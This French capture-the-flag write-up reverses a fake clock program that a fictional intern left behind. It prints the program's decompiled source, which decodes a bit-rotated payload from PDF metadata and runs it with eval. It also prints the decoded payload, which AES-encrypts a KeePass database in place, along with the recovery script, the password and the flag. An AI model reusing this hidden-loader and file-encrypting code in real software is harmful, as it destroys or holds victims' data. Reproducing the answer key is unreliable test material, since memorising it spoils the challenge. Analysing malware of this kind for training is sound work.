# WRITEUP HORLOGE DU STAGIAIRE

## Catégorie :

`Reverse`

## Consigne :

```
Vous représentez la société de cybersécurité Umbrella Corporation, vous avez été mandaté pour une mission concernant l’entreprise PandaDev. 
Voici les informations que Mr Rot R. (Développeur chez PandaDev et tuteur de stage) nous a données : 

* Un stagiaire a réalisé un programme d’horloge durant sa période de stage au sein de nos équipes de développement. 
* Mr Rot n’a pas suivi son travail et après le départ du stagiaire il a exécuté sur son poste le programme « Horloge.exe ». 
* Depuis cela, il n’a plus accès à ses mots de passe stockés avec keepass. 

J’ai mis à votre disposition le programme exécutable, ainsi que son guide d’utilisation. Avec ceci vous avez la base de données keepass du tuteur. 
Celui-ci nous a communiqué son mot de passe principal afin de vérifier que toutes ses données étaient récupérées. 
Vous devez récupérer les mots de passe de la base de données keepass. Au travail et bonne chance.

Mot de passe keepass du tuteur de stage : PommeFritte123

`d8df23518ea3af1906c6b4e3cb9a5ef005298830`  [Database.kdbx](https://download.marshack.fr/6c6f82406eeaa2ec175ad1ef25fc017c80be587c/reverse/horloge_stagiaire/Database.kdbx)

`d272c43da621d54d888ef0b89b090846d145a774`  [Horloge.exe](https://download.marshack.fr/6c6f82406eeaa2ec175ad1ef25fc017c80be587c/reverse/horloge_stagiaire/Horloge.exe)

`df56fbf44d2459992b21c1d8101905d417bb3b81`  [README.pdf](https://download.marshack.fr/6c6f82406eeaa2ec175ad1ef25fc017c80be587c/reverse/horloge_stagiaire/README.pdf)

> Format du flag : fl@g{CONTENT}
```

## Pièce(s) jointe(s) :

```
README.pdf
Horloge.exe
Database.kdbx
```

## Serveur :

```
Download
```

## Difficulté :

```
medium
```

## Hint : 

```
Néant
```

## Flag :

```
fl@g{ycSIdlh4IdnNzY4MFAyD}
```

## Solution : 

En premier lieu, en ouvrant le fichier README.pdf on obtient une information importante. Le langage de programmation utilisé pour développer le logiciel.

> Ce logiciel a été réalisé dans le cadre d’un stage. Il permet de connaitre l’heure de plusieurs fuseaux horaires. Il a été réalisé avec le langage python dans sa version 3.7.4.

Nous savons donc qu’il s’agit d’un logiciel développé avec python 3 et que le programme est un exécutable. 
Avec quelques connaissances en programmation, on comprend qu’il est possible de retrouver le code source du programme à partir de l’exécutable.

Pour cela avec quelques recherches sur internet on trouve des « unpacker ». 
Pour la résolution du challenge, on peut utiliser « python-exe-unpacker » et plus particulièrement le script « pyinstxtractor.py » (https://github.com/WithSecureLabs/python-exe-unpacker).

Les modules python requis sont normalement installés par défaut sur une kali.

Il ne reste plus qu'à exécuter le script .

```bash
$ python python-exe-unpacker/pyinstxtractor.py Horloge.exe 
/home/kali/Documents/Horloge_stagiaire/python-exe-unpacker/pyinstxtractor.py:95: DeprecationWarning: the imp module is deprecated in favour of importlib and slated for removal in Python 3.12; see the module's documentation for alternative uses
  import imp
[*] Processing Horloge.exe
[*] Pyinstaller version: 2.1+
[*] Python version: 37
[*] Length of package: 13183972 bytes
[*] Found 998 files in CArchive
[*] Beginning extraction...please standby
[!] Warning: The script is running in a different python version than the one used to build the executable
    Run this script in Python37 to prevent extraction errors(if any) during unmarshalling
[*] Found 475 files in PYZ archive
[*] Successfully extracted pyinstaller archive: Horloge.exe

You can now use a python decompiler on the pyc files within the extracted directory
```

Une fois la commande exécutée, plusieurs fichiers sont extraits de l’exécutable, on y retrouve des dlls nécessaires, les librairies précompilées et aussi le fichier de code source du programme « Horloge ».

```bash
$ ls -al Horloge.exe_extracted
.....
-rw-r--r-- 1 kali kali    1584 14 févr. 14:24  Horloge
-rw-r--r-- 1 kali kali    1030 14 févr. 14:24  Horloge.exe.manifest
-rw-r--r-- 1 kali kali   20752 14 févr. 14:24 'Include\pyconfig.h'
-rw-r--r-- 1 kali kali   32252 14 févr. 14:24 'lib2to3\Grammar3.7.4.final.0.pickle'
-rw-r--r-- 1 kali kali    6716 14 févr. 14:24 'lib2to3\Grammar.txt'
```

Seulement le fichier n’est pas utilisable sous cette forme, en effet il lui manque « le magic number ». Cette information manquante ne permet pas aux outils de connaitre le type de fichier. L’illustration suivante montre l’entête du fichier horloge sans « le magic number ».

![](images/horloge_without_magic_header.png)

Afin de rendre le fichier utilisable, il faut donc rajouter « le magic number » dans l’entête du fichier « Horloge ». Afin de trouver les données à insérer, il faut ouvrir un fichier avec l’extension « .pyc », récupérer la première ligne de donnée, la copier et l’insérer dans le fichier « Horloge ». Attention il ne faut pas remplacer les données existantes il faut insérer avant les données présentes.

```
42 0D 0D 0A 00 00 00 00 00 00 00 00 E3 00 00 00
```

L’illustration suivante montre le résultat attendu.

![](images/horloge_with_magic_header.png)

Une fois cette étape réalisée et le fichier « Horloge » sauvegardé avec les modifications, il faut ajouter l’extension « .pyc » au fichier.

```bash
$ file Horloge.pyc 
Horloge.pyc: Byte-compiled Python module for CPython 3.7, timestamp-based, .py timestamp: Thu Jan  1 00:00:00 1970 UTC, .py size: 227 bytes
```

Le fichier est à partir de là reconnu par le système d’exploitation comme étant un fichier python précompilé. L’étape suivante consiste à retrouver le code source du programme. Pour cela il faut décompiler le fichier « Horloge.pyc » que l’on vient de modifier. 
Il existe des librairies comme uncompyle6 permettant de le faire, mais on peut également le faire sur le site « Decompiler.com » (https://www.decompiler.com/).

Glisser déposer le fichier Horloge.pyc afin d'obtenir le script python.

```python
    # uncompyle6 version 3.9.0
# Python bytecode version base 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 22 2023, 10:22:35) 
# [GCC 9.4.0]
# Embedded file name: Horloge.py
# Size of source mod 2**32: 227 bytes
from PyPDF2 import PdfFileReader, PdfFileWriter
from PyPDF2.generic import NameObject, createStringObject
from tkinter import *
from time import gmtime, strftime, sleep
from base64 import b64encode, b64decode
import hashlib, os
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes

def ROR(x, n, b=8):
    return 2 ** b - 1 & (x >> n | x << b - n)


def ROL(x, n, b=8):
    return ROR(x, b - n, b)


try:
    pdf = PdfFileReader(open('README.pdf', 'rb'))
    eval(compile(''.join([chr(ROL(x, 3)) for x in [ord(x) for x in pdf.getDocumentInfo()['/Payload']]]), '<string>', 'exec'))
except:
    exit()

w = Tk()
w.title('Horloge')
w.resizable(width=False, height=False)
Label_Heure = Label(w, font=('', 100, 'bold'))
Label_Heure.pack()

def Heure():
    Label_Heure.config(text=(strftime('%H:%M:%S')))
    Label_Heure.after(200, Heure)


Heure()
w.mainloop()
```

Lors de la lecture du code source, on remarque qu’une information est stockée dans le fichier « README.pdf » sous le nom de « Payload ». 
Un premier indice qui nous met sur la piste que ce simple programme d’horloge n’est peut-être pas légitime.

```bash
$ pdf-parser README.pdf 
This program has not been tested with this version of Python (3.11.8)
Should you encounter problems, please use Python version 3.11.1
PDF Comment '%PDF-1.3\n'

obj 1 0
 Type: /Pages
 Referencing: 3 0 R, 4 0 R, 5 0 R

  <<
    /Type /Pages
    /Count 3
    /Kids [ 3 0 R 4 0 R 5 0 R ]
  >>


obj 2 0
 Type: 
 Referencing: 

  <<
    /Producer '(Microsoft\\256\\040Word\\0402016)'
    /Title (Horloge)
    /Author (Lary)
    /Subject '(Manuel\\040d\\220utilisation)'
    /Creator '(Microsoft\\256\\040Word\\0402016)'
    /CreationDate '(D\\07220200909102152\\05302\\04700\\047)'
    /ModDate '(D\\07220200909102152\\05302\\04700\\047)'
    /Payload '(þÿ\\000\\214\\000\\254\\000Ì\\000\\004\\000\\254\\000Í\\000l\\000N\\000\\057\\000\\016\\000\\216\\000\\005\\000\\016\\000
```

En analysant le code pour comprendre son fonctionnement, on peut remarquer que l’information contenue dans les métadonnées de « Payload » subit un changement avant d’être utilisée.

```python
eval(compile(''.join([chr(ROL(x, 3)) for x in [ord(x) for x in pdf.getDocumentInfo()['/Payload']]]), '<string>', 'exec'))
```

Ce que nous montre le morceau de code précédent est l’imbrication de deux boucles « for » permettant de parcourir les données du payload. Durant lesquels les données sont transformées sous leur forme Unicode avec la fonction « ord() » puis traitées par la fonction « ROL » et enfin les données sont remises sous un format de caractère avec la fonction « chr() ». 
Toute cette opération est concaténée pour former une chaine avec la fonction « join ».

le programme déchiffre les données contenues dans les métadonnées en effectuant trois rotations de bit vers la gauche. Cela sous-entend que les données ont été chiffrées avec trois rotations vers la droite. 
Et enfin une fois ces données lisibles le programme compile et exécute ces données.

On va pouvoir modifier le code python dans le but d'obtenir le résultat du traitement de la chaine payload.

```python
#eval(compile(''.join([chr(ROL(x, 3)) for x in [ord(x) for x in pdf.getDocumentInfo()['/Payload']]]), '<string>', 'exec'))
print(''.join([chr(ROL(x, 3)) for x in [ord(x) for x in pdf.getDocumentInfo()['/Payload']]]), '<string>', 'exec')
```

On peut ensuite exécuter le script python.

```bash
$ python3 Horloge.py
def encrypt(plain_text, password):
    salt = get_random_bytes(AES.block_size)
    private_key = hashlib.scrypt(
        password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    cipher_config = AES.new(private_key, AES.MODE_GCM)
    cipher_text, tag = cipher_config.encrypt_and_digest(plain_text)
    return {
        'cipher_text': b64encode(cipher_text).decode('utf-8'),
        'salt': b64encode(salt).decode('utf-8'),
        'nonce': b64encode(cipher_config.nonce).decode('utf-8'),
        'tag': b64encode(tag).decode('utf-8')
    }

def decrypt(enc_dict, password):
    salt = b64decode(enc_dict['salt'])
    cipher_text = b64decode(enc_dict['cipher_text'])
    nonce = b64decode(enc_dict['nonce'])
    tag = b64decode(enc_dict['tag'])
    private_key = hashlib.scrypt(
        password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    cipher = AES.new(private_key, AES.MODE_GCM, nonce=nonce)
    decrypted = cipher.decrypt_and_verify(cipher_text, tag)
    return decrypted

with open('Database.kdbx','rb+') as input_file:
    encrypted = encrypt(input_file.read(), "Rxypal1PU4CRP4tOcv7W")

with open('Database.kdbx','wb+') as input_file:
    input_file.write(bytes('.'.join([x for x in encrypted.values()]),encoding='utf-8'))
"""
with open('Database.kdbx','rb+') as cipher_file:
    data = cipher_file.read()
    data = bytes.decode(data,encoding='utf-8')
    enc_dict = {
        'cipher_text': data.split('.')[0],
        'salt': data.split('.')[1],
        'nonce': data.split('.')[2],
        'tag': data.split('.')[3]
    }
    decrypted = decrypt(enc_dict, "Rxypal1PU4CRP4tOcv7W")

with open('Database.kdbx','wb+') as cipher_file:
    cipher_file.write(decrypted)
""" <string> exec
```

Une fois les données du payload récupérées, on remarque qu’il s’agit de code écrit en python. À nouveau on analyse ce code afin de comprendre ce qu’il fait, car comme vue précédemment celui-ci est exécuté.
On trouve une fonction nommée « encrypt » qui utilise l’algorithme de chiffrement AES.

Cette fonction est utilisée sur les données du fichier « Database.kdbx ».
Puis ces données chiffrées sont écrites à la place des données présentes à la base dans ce fichier.
Après cela, on comprend que le fichier de stockage de mot de passe « Database.kdbx » a été chiffré avec cette fonction et l’algorithme AES.
Heureusement le stagiaire n’a pas pris le temps de complexifier le système et la clé de chiffrement est présente en clair dans le code.
Également dans le code on trouve la fonction « decrypt » qui normalement devrait permettre de rétablir les données du fichier chiffré.

Dans le code est également présent en commentaire un morceau de code qui semble déchiffrer le fichier « Database.kdbx ».

```python
"""
with open('Database.kdbx','rb+') as cipher_file:
    data = cipher_file.read()
    data = bytes.decode(data,encoding='utf-8')
    enc_dict = {
        'cipher_text': data.split('.')[0],
        'salt': data.split('.')[1],
        'nonce': data.split('.')[2],
        'tag': data.split('.')[3]
    }
    decrypted = decrypt(enc_dict, "Rxypal1PU4CRP4tOcv7W")

with open('Database.kdbx','wb+') as cipher_file:
    cipher_file.write(decrypted)
""" <string> exec
```

On peut ainsi recréer le code python permettant de déchiffrer l'archive keepass fournie.

```python
from base64 import b64encode, b64decode
import hashlib, os
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes

def decrypt(enc_dict, password):
    salt = b64decode(enc_dict['salt'])
    cipher_text = b64decode(enc_dict['cipher_text'])
    nonce = b64decode(enc_dict['nonce'])
    tag = b64decode(enc_dict['tag'])
    private_key = hashlib.scrypt(
        password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    cipher = AES.new(private_key, AES.MODE_GCM, nonce=nonce)
    decrypted = cipher.decrypt_and_verify(cipher_text, tag)
    return decrypted
	
with open('Database.kdbx','rb+') as cipher_file:
    data = cipher_file.read()
    data = bytes.decode(data,encoding='utf-8')
    enc_dict = {
        'cipher_text': data.split('.')[0],
        'salt': data.split('.')[1],
        'nonce': data.split('.')[2],
        'tag': data.split('.')[3]
    }
    decrypted = decrypt(enc_dict, "Rxypal1PU4CRP4tOcv7W")

with open('Database.kdbx','wb+') as cipher_file:
    cipher_file.write(decrypted)
```
	
Il nous faut ensuite l'exécuter avec le fichier Database.kdbx au même niveau.

```bash
$ python3 solution.py
```

Il ne nous reste plus qu'à essayer d'ouvrir le fichier Database.kdbx dans le logiciel Keepass avec le mot de passe "PommeFritte123" afin de récupérer le FLAG.

![](images/keepass_clear.png)

On obtient le flag qu'on peut reconstituer fl@g{ycSIdlh4IdnNzY4MFAyD}

![](images/keepass_flag)
